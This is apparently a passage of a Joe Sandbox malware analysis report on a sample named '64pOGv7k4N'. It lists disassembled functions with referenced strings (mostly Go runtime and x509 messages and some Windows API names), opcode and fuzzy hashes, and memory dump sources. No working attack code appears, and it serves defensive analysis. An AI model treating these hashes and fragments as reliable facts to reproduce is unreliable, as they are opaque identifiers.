                                                                                • API ID:
                                                                                • String ID: #$, tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUintRegister$attempt to clear non-empty span setber2der: BER tag length is negativeencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanL$fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unexpected string after package name: $head = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyB$span set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintptr : string slice index out of bounds : non-interface type passed to Type.Impleme
                                                                                • API String ID: 0-25292266
                                                                                • Opcode ID: f1ee10e3bd841944f76b991b815e44340717a9efcaacb9546e0fc643fc501976
                                                                                • Instruction ID: 6576e953926220814ae0767c71560a6ee65f591e5042482ba0065b1bf48e149f
                                                                                • Opcode Fuzzy Hash: f1ee10e3bd841944f76b991b815e44340717a9efcaacb9546e0fc643fc501976
                                                                                • Instruction Fuzzy Hash: 0B41C2B45087418FC300EF64D29576EBBE5BF89748F84886DE4C98B352D7749948CB52
                                                                                Function 00ADEDA0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '$'$Powe$erRegisterSuspendResumeNotification$owrprof.dll$powr
                                                                                • API String ID: 0-2222458068
                                                                                • Opcode ID: 7d13908ba561851a2acb7f4163d14e903dfdab7a2002e862e40a03154292327b
                                                                                • Instruction ID: 0613e9b356d40a5bb55cf5428cdfc4c67fc0185cef34bb144075ec45d65a4361
                                                                                • Opcode Fuzzy Hash: 7d13908ba561851a2acb7f4163d14e903dfdab7a2002e862e40a03154292327b
                                                                                • Instruction Fuzzy Hash: A831EEB45083059FD300EF24C58575ABBE0BB94348F40886EE4998B391EB75EA89CF93
                                                                                Function 00AC8ED0 Relevance: 6.5, Strings: 5, Instructions: 285COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AC91AC
                                                                                • runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,, xrefs: 00AC912E
                                                                                • markroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in , xrefs: 00AC91C7
                                                                                • not in stack roots range [363797880709171295166015625AddVectoredContinueHandler, xrefs: 00AC9158
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00AC9182
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: not in stack roots range [363797880709171295166015625AddVectoredContinueHandler$), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$, ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS$markroot: bad indexmissing ']' in hostmissing deferreturnmspan.sweep: state=notesleep not on g0ntdll.dll not foundnwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in $runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region of span!#$%&'()-@^_`{}~+,
                                                                                • API String ID: 0-1940792337
                                                                                • Opcode ID: 2f3a42c317bb0ca29d3e2c506e9892da33d48bdf02042ed31a9b4b533c1ccca6
                                                                                • Instruction ID: 50e16fa150fc7ab64d6333ee4c0dc12c642d05b8226aa6fc8ea5a6d2b9ac5c2e
                                                                                • Opcode Fuzzy Hash: 2f3a42c317bb0ca29d3e2c506e9892da33d48bdf02042ed31a9b4b533c1ccca6
                                                                                • Instruction Fuzzy Hash: 12D10474A08345CFC348EF29D594A5ABBF1BB88744F55882EE88987391EB74E844CF42
                                                                                Function 00AC9E30 Relevance: 6.5, Strings: 5, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR, xrefs: 00ACA121
                                                                                • nwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcda, xrefs: 00ACA200
                                                                                • work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW, xrefs: 00ACA17F
                                                                                • runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p s, xrefs: 00ACA1A2
                                                                                • work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses, xrefs: 00ACA14B, 00ACA1CC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcesses$nwait > work.nprocspageAlloc.scav.lockpanic during mallocpanic during panicpanic holding lockspanicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcda$runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected method stepwirep: invalid p s$runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR$work.nwait > work.nprocx509: invalid key usagex509: malformed UTCTimex509: malformed version116415321826934814453125582076609134674072265625AllocateAndInitializeSidAssignProcessToJobObjectAzerbaijan Standard TimeBangladesh Standard TimeBuildSecurityDescriptorW
                                                                                • API String ID: 0-3417598864
                                                                                • Opcode ID: 61162a50bf80196b38b38969bf114540b7da41093bee1c34b9ce174c9b335643
                                                                                • Instruction ID: c850e8d069620afe58c8fd8769267d708177db53c053d01a92c6bb731e32dfe4
                                                                                • Opcode Fuzzy Hash: 61162a50bf80196b38b38969bf114540b7da41093bee1c34b9ce174c9b335643
                                                                                • Instruction Fuzzy Hash: CBB112B46097448FC304EF64D694B6EBBE0BF88748F05896DF8899B392D775D848CB42
                                                                                Function 00AE7D60 Relevance: 6.5, Strings: 5, Instructions: 230COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel, xrefs: 00AE8066
                                                                                • casgstatus: bad incoming valuescheckmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s, xrefs: 00AE809A
                                                                                • runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_, xrefs: 00AE803C
                                                                                • 1, xrefs: 00AE7FF8
                                                                                • casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign, xrefs: 00AE7FEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFiel$1$casgstatus: bad incoming valuescheckmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use s$casgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on data that may contain pointersfully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough sign$runtime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_
                                                                                • API String ID: 0-853169293
                                                                                • Opcode ID: 338d3e5210659a015618ad3ca4cf4299cd5b77f268464b10d2b11e01909841f3
                                                                                • Instruction ID: bfb25da62673e884257652824010b8bdaa23b1b74ae8b891f4f77242dedc8674
                                                                                • Opcode Fuzzy Hash: 338d3e5210659a015618ad3ca4cf4299cd5b77f268464b10d2b11e01909841f3
                                                                                • Instruction Fuzzy Hash: AEA1F3745093859FC350EF29C19072EBBE1FF88344F5489ADE8958B362D775E84ACB82
                                                                                Function 00AF7F60 Relevance: 6.4, Strings: 5, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • out of memory (stackalloc)persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to me, xrefs: 00AF8004
                                                                                • stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic linksunaligned 64-bit atomic operationwaiting for unsupported file , xrefs: 00AF81EF
                                                                                • stack size not a power of 2startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map e, xrefs: 00AF81D9
                                                                                • !, xrefs: 00AF81F8
                                                                                • out of memoryparsing time powrprof.dll, xrefs: 00AF80CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$out of memory (stackalloc)persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to me$out of memoryparsing time powrprof.dll$stack size not a power of 2startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map e$stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65535)too many levels of symbolic linksunaligned 64-bit atomic operationwaiting for unsupported file
                                                                                • API String ID: 0-1005823644
                                                                                • Opcode ID: 3cb6dc06d4da442c1ee8bb7c1d14b356989805a1f9e6bca38804d294d6c4aa6d
                                                                                • Instruction ID: 0a0c6988c0fb2f58e7d53fe795836e9bb5c036fe5f2580c117903c1fb57ddeea
                                                                                • Opcode Fuzzy Hash: 3cb6dc06d4da442c1ee8bb7c1d14b356989805a1f9e6bca38804d294d6c4aa6d
                                                                                • Instruction Fuzzy Hash: 508167746083498FC704DFA9D58066EBBE1FF89300F54896DF9898B351DB38D949CB42
                                                                                Function 00ABB750 Relevance: 6.4, Strings: 5, Instructions: 178COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • persistentalloc: size == 0pkcs7: input data is empty required key not availableruntime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in address, xrefs: 00ABB9D5
                                                                                • persistentalloc: align is too largepidleput: P has non-empty run queue of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=ryuFtoaFixed32 called with prec > 9strings.Reader.Seek: invalid whencesuperfluous lea, xrefs: 00ABB9A9
                                                                                • persistentalloc: align is not a power of 2runtime: blocked write on closing polldescsync/atomic: store of nil value into Valuetest executed panic(nil) or runtime.Goexitunexpected signal during runtime executionx509: %q cannot be encoded as an IA5Stringx509: RS, xrefs: 00ABB9BF
                                                                                • runtime: cannot allocate memoryruntime: failed to commit pagesruntime: split stack overflow: slice bounds out of range [%x:]slice bounds out of range [:%x]x509: certificate is valid for x509: malformed GeneralizedTimex509: malformed subjectUniqueIDx509: malfor, xrefs: 00ABB982
                                                                                • *, xrefs: 00ABB9C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
